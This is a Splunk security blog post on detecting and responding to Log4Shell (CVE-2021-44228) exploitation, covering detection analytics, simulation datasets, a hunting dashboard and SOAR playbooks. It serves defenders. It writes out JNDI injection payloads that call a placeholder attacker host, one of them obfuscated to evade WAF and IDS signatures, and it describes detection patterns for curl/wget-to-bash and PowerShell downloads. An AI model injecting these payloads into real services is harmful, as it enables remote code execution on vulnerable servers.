This blog is a part of Splunk's Log4j response. For additional resources, check out the Log4Shell Overview and Resources for Log4j Vulnerabilities page.
Like most cybersecurity teams, the Splunk Threat Research Team (STRT) has been heads-down attempting to understand, simulate, and detect the Log4j attack vector. This post shares detection opportunities STRT found in different stages of successful Log4Shell exploitation.
One week after its initial release, we are still learning new developments for the Log4j vulnerabilities. At the time of writing, there are two publicly known CVEs (CVE-2021-44228, and CVE-2021-45046); the Splunk Security Content below is designed to cover exploitation attempts across both CVEs, including the recently released bypass technique.
We recorded a short demo setting up the Splunk Attack Range to simulate the attack. Using the data collected, we developed 13 new detections and 9 playbooks to help Splunk SOAR customers investigate and respond to this threat. A dashboard is also included to help threat hunters identify signs of payload injection in their environments (even obfuscated).
The Log4Shell exploitation path creates two unique detection opportunities before the defender must resort to more standard cybersecurity approaches. In particular, the payload injection and outbound connection stages will have specific patterns which defenders can utilize to identify the initial stages of exploitation. This section also describes the challenges that affect each of these detection opportunities.
In the first step of the attack, adversaries submit malicious payloads to attempt exploitation. In their simplest forms, these unusual injection strings can be easily identified by looking for special strings.
${jndi:ldap://attacker.com/evil}
The data sources that can be leveraged for this detection opportunity include web server logs, web and proxy logs, and API gateway logs. Using the CIM Web data model can be even more beneficial for defenders.
As with many attack sequences, obfuscation can be a powerful tool. In this case the payload string can be obfuscated in many different ways to bypass signature-based detection or prevention controls like IDS, IPS, and WAF products.
${${env:FOO:-j}ndi${env:FOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/evil}
Regular expressions can help reduce missed positives but will not provide coverage for all possible variations.
Although the initial attack vectors target mostly web servers and inject malicious payloads in common headers (e.g., User-Agent or X-Forwarded-For), there may be vulnerable endpoints for which logs are typically not retained (e.g., POST requests). Furthermore, the CVE-2021-44228 vulnerability does not only affect Web Servers and may affect any network service which utilizes the vulnerable package.
Adversaries are attempting to identify vulnerable servers and services through indiscriminate “spraying” of injection strings at visible endpoints rather than through deliberate identification of software containing the vulnerable package. Thus, defenders triaging alerts based only on injection string presence may encounter high false positive rates for injection attempts that may never result in code execution.
Successful exploitation will require the victim endpoint to perform outbound connections to attacker controlled infrastructure. To help identify compromised hosts, defenders can hunt for unusual outbound network connections from servers using Log4j libraries and using protocols such as LDAP or RMI.
Web proxy logs, firewall logs and NetFlow will provide useful data to identify these outbound detections. To accelerate identification of attacker activity within these sources the CIM Web data model, the Endpoint data model and the Traffic data model can be utilized.
IT environments of even a reasonable scale will frequently create desired outbound connections. Thus analysis to determine the legitimacy of those connections is in this case no less complicated than usual. Strong apriori baselining procedures or quantified measures of outbound connection to internal request will prove useful tools in this analysis. Of course this becomes more complicated in scenarios where applications are cloud hosted or outside of the typical corporate DMZ.
If successful exploitation is achieved, the Log4Shell CVE-2021-44228 vulnerability allows adversaries to obtain code execution in target networks. They are, however, still forced to engage in post-exploitation techniques to expand their access and locate/exfiltrate their objectives.
The data sources that can be leveraged for this detection opportunity include process and command line logging, powershell logging, file system audit logging, and network logging. Using the CIM, the Endpoint data model and the Traffic data model, can be even more beneficial for defenders.
Splunk encourages defenders to deploy post-exploitation detection coverage to detect adversaries that have obtained an initial foothold using Log4Shell or any other method. STRT has released several analytic stories that can help with this task including: Active Directory Discovery, Windows Privilege Escalation, Active Directory Lateral Movement and many others.
To better understand the Log4Shell CVE-2021-44228 vulnerability and to build testable detections, STRT replicated the attack chain using Splunk’s Attack Range. This section will walk you through the steps and requirements needed to test this yourself.
Here is a high-level diagram of the replication of a vulnerable environment:
Watch the video below to see the attack in action.
The above POC exemplifies how to compromise a host exploiting the CVE-2021-44228 vulnerability, however, exploiting this vulnerability in the field requires several conditions and may not be as straightforward as the POCs shared in the community (i.e. the vulnerable class information is disclosed in POC code).
To build our detections, the attack was replicated using both Windows and Linux vulnerable servers and executed different payloads like command execution, reverse shells, etc. Below are different attack datasets we generated as a result of simulating Log4Shell.
Defenders who are not able to simulate the attack could leverage these datasets to test detection logic in their own environments. The datasets can be replayed to Splunk Enterprise by using STRT’s replay.py tool or the UI.
Sourcetypes | Description | URLs |
Microsoft-Windows-Sysmon/Operational WinEventLog:Security Sysmon_linux | Manual exploitation of CVE-2021-44228-Log4j on a Linux and Windows endpoint. | |
bro:conn:json | Manual generation of attack data by creating outbound LDAP connections | |
nginx:plus:kv | Manual generation of attack data related to Log4j with Nginx proxy logs | |
stream:ip | Manual generation of attack data related to Log4j with network logs | |
stream:http nginx:plus:kv sysmon_linux | Attack data related to Log4Shell CVE-2021-44228 |
STRT developed a new analytic story, which is a group of detections and responses built to detect, investigate, and respond to specific threats, to help security operations center (SOC) analysts detect adversaries exploiting or trying to exploit the Log4j CVE-2021-44228 vulnerability. This section describes some of these analytics grouped by exploitation step.
Payload Injection
Name | Technique ID | Tactic | Description |
T1190 | Initial Access | CVE-2021-44228 Log4Shell payloads can be injected using various methods, but one of the most common injection vectors is via web calls. Many of the vulnerable Java web applications that use Log4j have a web component, making them special targets for this injection. Examples include Apache Struts, Flink, Druid, and Solr. The exploit is triggered by an LDAP lookup function in the Log4j package. Its invocation is similar to ${jndi:ldap://PAYLOAD_INJECTED}. When executed against vulnerable web applications, the invocation can be seen in various parts of weblogs. | |
T1190 | Initial Access | This detection correlates the previous analytic with outbound network connections coming from the same host. This will reduce the number of false positives and potentially identify successfully exploited servers. |
Outbound Connections
Name | Technique ID | Tactic | Description |
T1190 | Initial Access | A required step while exploiting the CVE-2021-44228 Log4j vulnerability is that the victim server will perform outbound connections to the attacker-controlled infrastructure. This is required as part of the JNDI lookup as well as for retrieving the second stage .class payload. The following analytic identifies the Java process of reaching out to default ports used by the LDAP and RMI protocols. This behavior could represent successful exploitation. Note that adversaries can easily decide to use arbitrary ports for these protocols and potentially bypass this detection. | |
T1190 | Initial Access | Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space. | |
T1190 | Initial Access | Identifies a Java user agent performing a GET request for a .class file from the remote site. This potentially indicates exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). |
Post-Exploitation
Name | Technique ID | Tactic | Description |
T1059.001 | Execution | The following analytic identifies the use of PowerShell to download a file using the DownloadFile method. This particular method is utilized in many different PowerShell frameworks to download files and output them to disk. Identify the source (IP/domain) and destination file and triage appropriately. | |
T1059.003 | Execution | The following analytic identifies command-line arguments where cmd.exe /c is used to execute a program. cmd /c is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch commands using different shells like PowerShell or different processes other than cmd.exe. | |
T1105 | Command And Control | The following analytic identifies the use of curl on Linux or macOS to attempt to download a file from a remote source and pipe it to Bash. This is typically found with coin miners and most recently with CVE-2021-44228, a vulnerability in Log4j. | |
T1190 | Initial Access | The following analytic identifies the process name of Java, Apache, or Tomcat spawning a Linux shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are "sh", "ksh", "zsh", "bash", "dash", "rbash", "fish", "csh', "tcsh', "ion", "eshell". Upon triage, review parallel processes and command-line arguments to determine legitimacy. | |
Malicious PowerShell Process - Connect To Internet With Hidden Window | T1190 | Initial Access | The following hunting analytic identifies PowerShell commands utilizing the WindowStyle parameter to hide the window on the compromised endpoint. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet |
T1105 | Command And Control | The following analytic identifies the use of wget on Linux or macOS to attempt to download a file from a remote source and pipe it to Bash. This is typically found with coin miners and most recently with CVE-2021-44228, a vulnerability in Log4j. | |
T1190 | Initial Access | The following analytic identifies the process name of java.exe and w3wp.exe spawning a Windows shell. This is potentially indicative of exploitation of the Java application and may be related to current event CVE-2021-44228 (Log4Shell). The shells included in the macro are "cmd.exe" and "powershell.exe". |
Included in the analytic story is a Splunk hunting dashboard that helps to quickly assess CVE-2021-44228, or Log4Shell, activity mapped to the Web Datamodel. Because this Log4Shell vulnerability requires the string to be in the logs, the dashboard will help to identify the activity anywhere in the HTTP headers using raw field. It is also easy to modify the analytic to use the same pattern-matching against other log sources. Scoring is based on a simple rubric of 0-5, with 5 being the best match. A score below 5 is meant to identify additional patterns that will equate to a higher total score.
A breakdown of the eval statements:
Scoring will then occur based on any findings. The base score is meant to be 2, created by jndi_fastmatch. Everything else is meant to raise the score.
Finally, a simple table is created to show the scoring and the raw field itself. Filter based on score or columns of interest.
We hope teams find this useful to quickly assess datasets and modify them as needed.
Name | Technique ID | Tactic | Description |
Hunt for Log4Shell activity in logs. |
If your infrastructure has matured to support automation, Splunk has released nine playbooks for investigating and responding to Log4Shell vulnerability CVE-2021-44228. While there are no substitutes for timely patch management and secure software supply chain practices these response playbooks can fill in gaps in time sensitive scenarios such as this. Here is a diagram of how those playbooks fit together:
Playbook | Description |
This is the parent playbook that manages the IPs and hostnames of potentially affected hosts and calls the appropriate sub-playbooks for each one. | |
Use data already in your Splunk Enterprise environment to help investigate and remediate impacts caused by this vulnerability. | |
Use SSH and Bash to investigate each internal Unix host that might be running Java with Log4j. No response actions are taken on the host, but information is gathered about the Java version in use, the presence of JndiLookup.class in any JARs, the presence of Log4j JARs in any WARs, and the presence of any running Java processes. The results are zipped up in .csv files and added to the vault for an analyst to review. | |
Use SSH and Bash to collect generic information about the activity on each relevant Unix system that is not specific to Log4j. This includes the process list, installed services, login history, cron jobs, and open sockets. The results are zipped up in .csv files and added to the vault for an analyst to review. | |
Use WinRM and PowerShell to scan each Windows system for the presence of a "JndiLookup.class" file in any JAR files on any drives. The presence of that string in the zip manifest could indicate a Log4j vulnerability. | |
Use WinRM and PowerShell to perform a general investigation on key aspects of each Windows system. This includes users, groups, running processes, open sockets, startup commands, and scheduled tasks. The results are zipped up in .csv files and added to the vault for an analyst to review. | |
The parent playbook for the two response playbooks. This is where we determine what hosts to attempt to mitigate using SSH and WinRM. | |
Use SSH and Bash to perform mitigation on each host. If filenames are provided, the endpoints will be searched and then the user can approve deletion. Regardless of file deletion, the user is then prompted to quarantine the endpoint with an iptables rule or shut down the endpoint. | |
Use WinRM and PowerShell to perform mitigation on each host. If filenames are provided, the endpoints will be searched and then the user can approve deletion. Regardless of file deletion, the user is then prompted to quarantine the endpoint with a Windows firewall rule or shut down the endpoint. |
As usual, playbooks rely on SOAR app connectors to perform their actions. In this case, the apps are Splunk, SSH, and WinRM. Please see the in-product app documentation to configure these apps. If you use CrowdStrike, Carbon Black, Windows Defender, SentinelOne, or any other endpoint security solution, you may be able to convert these playbooks to use the live response capabilities of those tools instead of SSH and WinRM.
There are two ways to trigger these playbooks. The first is to use a custom list, which is the equivalent of a spreadsheet embedded in Splunk SOAR. The default name of this custom list is “log4j_hosts” and the expected format is the IP or hostname of the internal potentially affected host in the first column, and the operating system family (“unix” or “windows”) in the second column. Here is an example:
hostname1 | unix |
1.1.1.1 | windows |
hostname2 | unix |
Once the custom list is configured, you can start a blank event in Splunk SOAR and launch the playbook “log4j_investigate” to kick off the process. This will create the required artifacts at the beginning of the first playbook.
The second way to trigger these playbooks is to forward a notable or alert to Splunk SOAR from Splunk. You can manually send an alert using the following command at the end of your search.
| sendalert sendtophantom param.phantom_server="phantom" param.sensitivity="amber" param.severity="Medium" param.label="events"
Replace the phantom_server parameter value with the name of your Splunk SOAR instance as configured in the Phantom App For Splunk. Ensure that you have the “deviceHostname” field, which is required for the playbooks, and if possible, provide the “operatingSystemFamily” field, which should be either “unix” or “windows”.
You may notice that the “log4j_respond” playbook is executed automatically at the end of “log4j_investigate”. However, that playbook runs off of a slightly different custom list called “log4j_hosts_and_files”. If you determine that you want to do bulk remediation, you can create that custom list as well and either launch “log4j_respond” in the same container or create a new one just for the response. In “log4j_hosts_and_files” you can use the same format, except there is an optional third row with full paths to files marked for deletion. Of course, all response actions are preceded by prompts that will wait for confirmation by an analyst.
It is awe inspiring to see our industry collaborate to address this vulnerability. Even inside Splunk, it has been a multi-team, multi-evening effort. Our SURGe team provided customer guidance within 24 hours of the attack. Our internal security team published an advisory of our affected products within three days of the event. Security Field Solutions collaborated with STRT to build playbooks while we focused on simulating the attack and shipping Enterprise Security Content Update 3.32.0.
On a final note, Yahoo has released a tool that checks if a host is vulnerable to Log4J (CVE-2021-44228) exploitation, and our very own James Brodsky successfully operationalized it via a Splunk Technology Add-On called TA-check-logFORj. The wrapper Brodsky created simply plugs the Yahoo tool into the Splunk Universal Forwarder (on Linux) so that you can report on the results of the tool across your entire UF fleet. Thank you Jan Schaumann and James Brodsky for sharing this with the Splunk community!
I would like to extend some special thanks to: Matthew Modestino, Tim Meader, Christophe Tafani-Dereeper, Florian Roth, Olaf Hartong, Johan Bjerke, Kelby Shelton, Philip Royer, and Kevin Beaumont. Without your contributions this blog would not be possible!
The Splunk platform removes the barriers between data and action, empowering observability, IT and security teams to ensure their organizations are secure, resilient and innovative.
Founded in 2003, Splunk is a global company — with over 7,500 employees, Splunkers have received over 1,020 patents to date and availability in 21 regions around the world — and offers an open, extensible data platform that supports shared data across any environment so that all teams in an organization can get end-to-end visibility, with context, for every interaction and business process. Build a strong data foundation with Splunk.